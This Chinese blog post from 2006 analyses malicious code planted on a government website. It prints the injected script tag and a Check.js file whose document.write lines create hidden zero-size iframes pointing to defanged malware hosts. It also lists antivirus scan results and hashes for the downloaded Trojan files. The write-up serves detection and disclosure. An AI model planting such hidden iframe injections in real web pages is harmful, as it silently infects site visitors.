endurer 原创
2006.01.05 第1版
今天在浏览前几天刚发现的那个被加了被加入自动下载病毒文件的代码的政府网站时( 详见: 某政府网站被加入自动下载病毒文件的代码(第2版) ),发现其中自动下载病毒文件的代码变了,转了一次弯。
首先是使用:
〈script src=hxxp://www.****5166.com/tour/Check.js></script〉
来引入文件Check.js。
而这个Check.js里面其实是HTML代码:
document.write("<iframe height=0 width=0 src=hxxp://www.***csedu.gov.cn/workOA/good/index.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://www.***hjonline.zk.cn/muma/mm.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://whc330330.***go.3322.org></iframe>");
浏览器在打开
hxxp://www.***csedu.gov.cn/workOA/good/index.htm
时会自动转到
hxxp://www.***csedu.gov.cn/workOA/good/nt.htm
(nt.htm被Kaspersky将报为Trojan-Downloader.JS.Agent.h)。
浏览器在打开nt.htm时则会自动下载:
1. hxxp://www.***csedu.gov.cn/workOA/good/mmmmm.gif
http://virusscan.jotti.org/扫描的结果:
| File: | mmmmm.gif |
| Status: | INFECTED/MALWARE |
| MD5 | ac49ef4f23c35cdd5830fb691890ef47 |
| Packers detected: | - |
Scanner results | |
| AntiVir | Found nothing |
| ArcaVir | Found nothing |
| Avast | Found nothing |
| AVG Antivirus | Found nothing |
| BitDefender | Found nothing |
| ClamAV | Found nothing |
| Dr.Web | Found Trojan.DownLoader.5583 |
| F-Prot Antivirus | Found nothing |
| Fortinet | Found nothing |
| Kaspersky Anti-Virus | Found Exploit.JS.Phel.m |
| NOD32 | Found nothing |
| Norman Virus Control | Found nothing |
| UNA | Found nothing |
| VBA32 | Found nothing |
2。hxxp://www.***csedu.gov.cn/workOA/good/xxxxx.pif
http://virusscan.jotti.org/扫描的结果:
| File: | xxxxx.pif |
| Status: | POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database) |
| MD5 | 286fd19874a5558a479187c253a4909f |
| Packers detected: | - |
Scanner results | |
| AntiVir | Found Heuristic/Trojan.PwdStealer (probable variant) |
| ArcaVir | Found nothing |
| Avast | Found nothing |
| AVG Antivirus | Found nothing |
| BitDefender | Found nothing |
| ClamAV | Found nothing |
| Dr.Web | Found nothing |
| F-Prot Antivirus | Found nothing |
| Fortinet | Found nothing |
| Kaspersky Anti-Virus | Found nothing |
| NOD32 | Found probably a variant of Win32/Hupigon (probable variant) |
| Norman Virus Control | Found nothing |
| UNA | Found nothing |
| VBA32 | Found nothing |
